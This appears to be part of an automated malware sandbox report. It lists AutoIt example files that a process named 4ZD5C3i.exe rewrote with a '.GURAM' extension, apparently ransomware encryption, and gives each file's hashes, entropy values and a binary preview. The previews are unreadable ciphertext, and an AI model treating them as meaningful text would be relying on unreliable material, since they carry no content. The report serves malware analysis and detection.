                                                                                                                                                                                                                                                Preview:s...R1........0..ab.aJ..W./.i...4^.Q.D!ZdJ*..F.d.y.R.U.R:Cy.u9M.....hnD..<RY....E....1.(L...|V.@Y..K5`..J~...!.GGc'rp+..s'.Yx....r......O>.].E.r...eP....A@..tf.....b.j.9.ej2.....^"-.{.L9....%d++../.._K..4.O.@U.<V..G.?.X..6.......$..0@....t../..IW..".a ....78.Z...A.q..S.p...".t..K\...K.E.3.6....Qc..h..X^N7........N.~;JQn....."zt.#F3m.......!&{.#.X..asW.}Xr..|..~.......f......D.(C.DA..\....y@..x...a..v...?.5;.AJ.;W.43.d...y.....\W..P..,...7...i...F...Z.c.%...D...i......P`..S.I....@.......+..........h..w........J....>..Yz........4..0.a<J..p.......q.!...y.d.Y.t.dZ.{..........'s....|...a.%....sf.....-..2E..:...Q...3"!.....mH...H..[2....A.|..j.+U...Q.XX8.O.||.<.5..H...w.z~..^.B.....@...A)X..}.A1G..9.N..<.T....?n..m.2.8.^D.B..F.j.....|7_.L.*\J.|...w.${s.....G..5|.R#%S..........@.v...z*......9.`zv1.v~.p..`O4.....P.;*24.J7ki.....6....`.%.6.4].....C.Y.W..B;.a..3E.D)...P.~.@.......9....M.)+..P....$i..*d.S.h.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\MapRemove.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2330
                                                                                                                                                                                                                                                Entropy (8bit):7.919690447086896
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:ELSH6drh3ABTDA+Ji6nva/1Mz+3tWXG4o0jZtwD:+HVE3AYi6nvbz+oleD
                                                                                                                                                                                                                                                MD5:050153D08561400E0EB6350CE8854684
                                                                                                                                                                                                                                                SHA1:16F9C2AA93517E57E538567D01CF69E92243E1B5
                                                                                                                                                                                                                                                SHA-256:8003A76E2D38DCE6E294C3C95B8AFF0F0EA100C31BC05E8690C65F0CBFD85450
                                                                                                                                                                                                                                                SHA-512:D68FACEA84A48A5365EF74C507E7304C5632B88673C2260B8393BA12F8EF7B6D4B135AC69844716AAD6F6B02A95E5F79FDDF9946C0E7695D885EF340DD0F7AE0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:1...N..S..R<o....=.....R.<.....1.R}1.g.Y..qf.g....F....Q..._.f.0G.X...........k..0.l.....m5X.........c.......}.....).0...".4.:N.. 7nC....L2g.%N.<...z.:T.E..v....c3.H{E.>.gb.Q=H..r...w...'s....@.(.n..B....C}..P..gz|.f...~.K...&.P k..Pcs.u.V.|N......x...A..a....m.>m |s....i.Bk.Ykp...7h!..r.$`..$....).t....7,n.P....u.=Q.N..H._.2{.f.Q..Q<...1.Ty..=.)....G....].....>.).]....=.&-..6......N..t-a!.....Y.<.$......M..I......A.z.........D...B.$..n..<.N..}...5...Co.E.{SvY.$.|jn~T..S.../..f..X....U7..@.v..0..h)X...}K........Y6..(.`w.T....=.#..G..{...8....8...CS.....j...J[q....]..kU..l.&..{.!....I....Rb.......&...|y.Q.J.B.X.u..-.c. ........S..F.,m.^..N......W.IE~.FT$.C....._.G.P*.;w@=$.......u..u^;4...2.G.:.../y.I'yFg...]:x} ...*.heco.....b...Y..k.E(.H[.".;......n...Tz..vt.'w.{,M..tE`....B.N.B.J.oQ..a...g...b...%.A......&..#.......VP...=..f.3cp.I./O.......x..xp.....,.8.>..%bf.5...X...3.#j,..o.?.waU...N.IgI5.X...*....#...$}6...WU.@}6...!......O(

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\MemGetStats.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1795
                                                                                                                                                                                                                                                Entropy (8bit):7.903983373613784
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:Wu/nZM87mGkHNKERWFsY9tqDTU5eYioFEW7gFtUIjmJrc0YXUZtwsT4V2a:dG8YQzb0TETpsUW4o0jZtwBVd
                                                                                                                                                                                                                                                MD5:1124E110086AF5A7B5864A9E6D3B5237
                                                                                                                                                                                                                                                SHA1:EFFBF0BD3034504228F195ED9518D449CD3576CC
                                                                                                                                                                                                                                                SHA-256:CAB6DE7C7ACAEB8590560635B149A1BFCA9B057CD741E41AE7C1D6707DA692C7
                                                                                                                                                                                                                                                SHA-512:16B9E9F8B01ECB7E057C3FDB5FED57FD5D82EC03647D316CFA3CF1AD132F1F1B9A77A11A3821144A47B2F9A26CDE13EB9E991C6BE023409EB994F3A895AB869B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.ICi..X........\... .}%..N.....W..w..o{.jX4....R.3....g.!~....B...$u..f9e.i.w..}6.~.y.B.da../:.)...W..i..3...~l.Xc..S...n.......c?......@.u:..}A.[.I.....*._..D.T@5~...X....<..|.C...Y.k.mj.W-...T..l....jGz...V;...(.2.M.C...*.Q.5.H.e...Mp.(.....X.L/O.M...r9...Q...Jt....X./2..-.GQg.5..[)..K.....w1......:t.f...z$..0..g..]w.....'.-.F.j.gc...Z~F...v.........C.bN.{....E.!.j..1.H.3.U..O*.d...nt..n.?.......$[......}..c..R...w.(.N>x.A...........1(#....T\$.'...`R.]...s.IE.1f8 ....v..3.<!...Z...,..:.U#...6~b.tX.*......z....&.....&..b.&?6.qd..w....|.i>....,J0.sn.......'P&Sb.V0S..P.M..mC#`..F..n50v.....v.... .O..5...^..1....#..i.!a....j..#.B...bMK;..Fw...B......j..1.[.2t.?Y..$.Z...U....u.}....d.>...*.~..r.Q..C.OwIT[U+g...?e....'.9:{6?c...."..t.(;.....&R.r...}."..wHHG..?...aCp....z..jB....zE.F....H.....3..W..%..Q]...9.... 4.v.L.u....+..k" '.....g.\DE....._...7...g...@.2.t.t..[...._....U*..Xg;.@..?#.aC...Gu.......Dr.....1..).KP8.Q'. .C*...a..`.+.".,@

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\Mod.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1408
                                                                                                                                                                                                                                                Entropy (8bit):7.842546940507605
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:exobzIcnTG39ZO7OA+h6j1kwQqBhHQYSqjmJrc0YXUZtwsTIIA:exazRyN8x+hgkwVBhHQG4o0jZtwZIA
                                                                                                                                                                                                                                                MD5:B599599D30BC5F31F5AF2DDD9B206688
                                                                                                                                                                                                                                                SHA1:9908203E28F535751E8D06220CE9C0CC574FE520
                                                                                                                                                                                                                                                SHA-256:05146888A870FC25F6A722E2EB9E456C5C04FEF65C8CC4BD3425EA680D459AA5
                                                                                                                                                                                                                                                SHA-512:C9B373947D7DE58A53A93AA8A9071E34B459126D767A7D4CED8356E637AE62DC8D23923C08D610026D7377FA3F69F664EC55E8D80942FDDC032C62C18A049866
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.;..ed.....o.SS/....r.;)*.....J.v$..........V./.o.B.%k(.Q.*n_].wKr6{.....r.XV.2.....4c..Vw.}...$q+..& .F...@.W.l...... ...L... D.....%......g......y.Q.tKr....9.{.Ju.n.BK.;....E.>.....r.o....%........l...s....2.]....:.....o)..I.(...I.B..R.9Ns......N..y.....7j=..'.:xI.GG.<\..z...="]....D.4.e...\Z....|.G..7X5.6..\ .....K..w.]...8...yX.....es.v...G...n.2r.Fx..8wZ.....MC.ZZ........6.;...V...4...-.+..._E<....]..?.!k.....H........X.)f._%..4.&.2....'..w@r......4{_....A.....<.s.....{. .....E.....I9c)8...J.v.i.b..e..Q...>i....\2.L....F._..7+.*,.[.Y...F.8UD...{.JT<].....b..).4.B.R...P..qq..........k.t8\Q......|q..P.).q.....s..Y..n.=.m....>c..m0..K..8z.x<.... .-...o...B...nA...6~......JlI;.".j..................{!.p....WGV}....Fv.8..X..p.....#.....5.v{+K..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\MouseClick.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1014
                                                                                                                                                                                                                                                Entropy (8bit):7.782074917733637
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:O7+PyfcDpU5ZWaudAMu65EuG92jmJrc0YXUZtwsTMvqyK:O7+KMEQo1J9I4o0jZtwKZ
                                                                                                                                                                                                                                                MD5:0DA814CA93893DEC1DBED323346FD164
                                                                                                                                                                                                                                                SHA1:98279495E1129306AF23A4B8AF78F68F5430B98D
                                                                                                                                                                                                                                                SHA-256:63B6E7CAFB2AA32B500A74309E64DB73E0BD9EAF406DF047187B6F079217969E
                                                                                                                                                                                                                                                SHA-512:6EE5C1F4BDA38D2D766DC55B3B4796B01AE945B4A7FF7BC9C93E0302F38282F9D16B2AD9FD90F51FF6B27D05EE060AC02698B04A49090893521265102C9F3F02
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.OXr.[o...7......M8.z.Tb...#!wt<]l..X..{.7~.Gh.g{..."..@....)..qi.`.Ta.......G..Q.j..+F.@.}=f...".S..q..j.........e......5C..a.+...0.3.X..z&?..k....oJ.\...!.n...^.....|.b..A.a..%.G.O?p.1!A.+h..< ..q...\.*h........^e=..........7^..pj.z.G@2.._...R.Q..Y.o.3@......Wi..A...I..?.;`.J..5....b.3.5.Q"Hp.6..Cs.h..........l....(v.!.NW4...?.........V..<6..q_.fK..Su...!....]d..)..0."_.&.tB.J.?K..u5....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.qV.n/.X?.$.g...".Z......{*..Im.G+.BY..............

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\MouseClickDrag.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):740
                                                                                                                                                                                                                                                Entropy (8bit):7.694755804572411
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:QIDffPEqJiejaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZk6KSXllC:QIDXPTJvjmJrc0YXUZtwsTlKaC
                                                                                                                                                                                                                                                MD5:406101F14E5716A205C5E6B58AADBF5F
                                                                                                                                                                                                                                                SHA1:B7F56B27366E0E03C4338520EA3B43D82AD38923
                                                                                                                                                                                                                                                SHA-256:ED462B0DCC28D29FD12B2827A72DB3A61177C514ECD4CD6E5A4DDB29B2AA93C1
                                                                                                                                                                                                                                                SHA-512:5962188938758A68F2E8240C5D9C4CB7D3ADB9B22C764215F4C386B6519BF3F83552E5A090CA6A64E03393DB402974EDF1392C438AAF3CBDF6C712AF4BAB377F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:J#J}...).._z.,V.T.....;V.....p.'...+RN.....^[@.v..&p...3.#.'..p...q..jkd.............PM....a...j+..F..c....6!.)O..O.`.o...r.....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$....6.*.m..q/!.8..<....._..#2..0@Q..+....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\MouseDown.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):796
                                                                                                                                                                                                                                                Entropy (8bit):7.701667420497207
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:7rZHSMCPMTo4uXDQhwknDjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO19:7r4MvcD8ikDjmJrc0YXUZtwsTuI
                                                                                                                                                                                                                                                MD5:CEAB986A030CB901D476B4D684666A73
                                                                                                                                                                                                                                                SHA1:3EA60AE621A7CFB4276EC84D5BC5627E28D9400A
                                                                                                                                                                                                                                                SHA-256:49ADF00C00F7C997ED7B1C94CB81CCAC73DFA3A34E3394AFEAD412931ED6059C
                                                                                                                                                                                                                                                SHA-512:BFB1D1A73E5FC74850457F71332C4D6D23B743E328A7B703060E4D3930D06767E1C59AB2A09215BBD41A98FF2CC3E3AFF183E6F63391D40C4826FBC80F4E4F30
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:OA..N....w`....'.T#........@;8..^..........tH..%H..@h@@..._...*..vy.....(.A..6UQ9 ..Z.;......F.........5......R...-..`.......0.3Cr_z4.1.MM}!HE.D5.>.c..?f:.<.......,.s..z^Y`Z.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$....U +p.r0.$......h..i....a6..x...'....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\MouseGetCursor.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1401
                                                                                                                                                                                                                                                Entropy (8bit):7.8291561408320725
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:WpgUNAobhK7hmgUccfGEVkzXEJylo1+hLOCVe9jmJrc0YXUZtwsTO:WplbhK1tUcKez0Ulo14OG24o0jZtwJ
                                                                                                                                                                                                                                                MD5:0095FD579935592B5751DF5E72F478A2
                                                                                                                                                                                                                                                SHA1:2A64433EE5563B6316A18EC6F165335B34C01CEE
                                                                                                                                                                                                                                                SHA-256:8EA9786641D5E8381375C10240DD9D179C7C08469389E260DE6E7DDF887EB9D7
                                                                                                                                                                                                                                                SHA-512:C62B5D9A1A9BC5F8FBFCE8BD91C57E1B8FDA720D8757B6D6FAE6404B4B61FA895BE01234B00DE65CD1A658C608E08B215327BC6626ED307D5BE1C972FAB48DC7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:......z.....R.qc+.].G..NS<...<.[?I...f..n.jr=I$43...Omj..B.O.l.KGd.2+!...6.q...6"..R<...[....)-Xw1..._..N4......~^..b...\..%~....L.fxgr..^...w......"..TP0I.iV..m...r.5d......>...x%7.........C.P<>...<.g.J.x.........+.0.Jz....w.`T@.k.T.w.e.G.....9.{.'.Y./._*..M...S...[.S*=g.?.6. ......_.G.zf.J^N..A....j+.%...X\.c...0..&....)...M^6..N.j"....3`....y$.,$...a'$}..lw^...g;.,#......}....... k....y..f6C}...C...e,....B....,.OgL..mO..rxK.8...C....~..I.f.V.?~..8N4..1...s.. ..."..s..#..{~.y. .\.....A...wb.X...KW.P.,.....]......4D...O.m.....).....EU......t.|.U5C|C(r....=..X.J.D..|...-u..-mVw..I.E....B....To....V.#A{Tn.....Sc+G..Q...D.@.{...Z...H...\l9rqH..tXRRlT ..S.....-.g.CG.k.....:4.o......Q.@...}w...4.l.F..j.....&........B.....,.qNk<......?...T...v.p..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\MouseGetPos.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):739
                                                                                                                                                                                                                                                Entropy (8bit):7.690844126763746
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:bOBk6jQyjnxMjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZwJdaku:mk6jQyjCjmJrc0YXUZtwsTcJk
                                                                                                                                                                                                                                                MD5:D4F77430CD02DB2D654DD2430F5BD5AC
                                                                                                                                                                                                                                                SHA1:9262FADBC7852B0C350B417BC6A40CC6D4915F83
                                                                                                                                                                                                                                                SHA-256:3764F71362F1D7A40DAC8B44B4CD2FC00DFD0D5449E32E727FC8947C55A000EB
                                                                                                                                                                                                                                                SHA-512:6FB6F5CEBAF6270F3AAFA7183B94209D42ED878C62669932C9B91811B435E80000F19C36DB10BE5C0246D4ECD0CD06AFFE2DFAE66833F9F577AA423201FF04C8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.0X...y'....I..8...:...D.z..q.;...s$....7...*.g.YF*.....i..`qF..7>..........O.A'...#,<-...2\..I#..&..4.8Z.s-I.x...z..,z....F.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..b'Y.......i...dA:...$..f..F..b*.\......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\MouseMove.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):786
                                                                                                                                                                                                                                                Entropy (8bit):7.715292213977968
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:m5SxaQxKr3RgeMxJjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZ5/6:85Qu3RQxJjmJrc0YXUZtwsT9/Te
                                                                                                                                                                                                                                                MD5:1723B44D28F59954FDBE9B9EBB70BA5D
                                                                                                                                                                                                                                                SHA1:66D2F55231C11C1F349B39AE3D919C43D8DC498E
                                                                                                                                                                                                                                                SHA-256:4DB6FB7CF54E4C8BB305A72B5D76B33995E9D20DA7CEA739123623ECA476E572
                                                                                                                                                                                                                                                SHA-512:B7F101C8E141F7A24ED6898FCEDFF22902EDB44CE4A928E60DA331A67BB6EA6665BE9F2FAF962F362661415D5E445B40D6B9B6DC136C8773A8CB299A1450DF88
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.VR+BJ.v.N....2.....)...@.....WkE..*....Q...h...0..........|..%..._r....v:a.....erb]..(...B....Qj]..w6..h,..9..W.&.F{.......a...4~.$..W<.........J.3.6...8~|.r...l..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.......6.......9O.....aqtEi.....W..{....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\MouseWheel.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):715
                                                                                                                                                                                                                                                Entropy (8bit):7.638030022347442
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:DTze0HaPtP2jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZ6Uk0ku:/YVOjmJrc0YXUZtwsT/n
                                                                                                                                                                                                                                                MD5:EAFB8B7725F96A0A0A0887A5BE32B169
                                                                                                                                                                                                                                                SHA1:8EA5D4224EAA058280EF3AB38C3B54682F25C879
                                                                                                                                                                                                                                                SHA-256:EB43FA55410FEA3ACB403BF197E575C49023CD4CD1EF379AFFF47250DB7639C3
                                                                                                                                                                                                                                                SHA-512:C4ECDE0B1F3D90EAF32CD9A1436AE9FFE6E3C2C6BE74EF77B6E3F6468FF55CA947531A5610A6A74355B5CEEE276A4C4E1090EC23C96B1884C8B9C59FF1A93C99
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...5._b..G..5U.}X.U..{$.3w..w.-.2.....h.....;.?......)c.......J........'..D?...%z~.j...Y.o.J...#..5V..9....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.Y:....p....j.<..Pk.......E..F....J.k...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\MsgBox.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):755
                                                                                                                                                                                                                                                Entropy (8bit):7.701055269469575
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:UOjiXk6zi0BjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZZBDFxku:UOjizi0BjmJrc0YXUZtwsTHFR
                                                                                                                                                                                                                                                MD5:344DC371D3D63284C5D8DF295556C780
                                                                                                                                                                                                                                                SHA1:586788C88545F9A6BC7843BE4F65B1B27B6F39D2
                                                                                                                                                                                                                                                SHA-256:4C117EAC0A6851AA3DDC59E92D1275A52DAD58C704BD7ED6A65C279400473A63
                                                                                                                                                                                                                                                SHA-512:798DA5DF6E81CDB3E5854B098801F8C50C76F60CCA33F079596A9A803CEA5783F5682A50570A682D2E87CD097F59F263120438821E49C3BD2B731E7397B6B8A5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:*.*.Z.....{.H1..%....psmRp ..(..n<&.t.u....[>..s..L..:....}zd#y.!.-...NrC4'.N..../.b.".....5..K.a._BG..f.A|..#.w..Z`..}u!.C.D....'..!......%_.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..E...b........|.Z...$......g.(.?.K.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\MsgBox[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):862
                                                                                                                                                                                                                                                Entropy (8bit):7.725949221232393
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:I2htJzLCvXBvUSshOjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZAH:X3LcvUS1jmJrc0YXUZtwsT6Ek
                                                                                                                                                                                                                                                MD5:2C61FEFEA717FF0A68F69D1BC284A2BF
